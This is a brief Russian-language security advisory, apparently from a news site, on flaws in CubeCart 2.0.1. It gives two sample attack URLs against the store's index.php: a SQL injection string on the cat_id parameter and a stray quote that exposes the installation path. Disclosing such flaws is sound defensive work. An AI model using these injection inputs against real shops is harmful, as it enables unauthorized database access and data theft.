Программа: CubeCart 2.0.1 

1. Удаленный атакующий может выполнить произвольные SQL команды на севере:

http://[target]/store/index.php?cat_id=1 or 1=1--

2. Удаленный атакующий может определить путь к установочной директории:

http://[target]/store/index.php?cat_id='

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии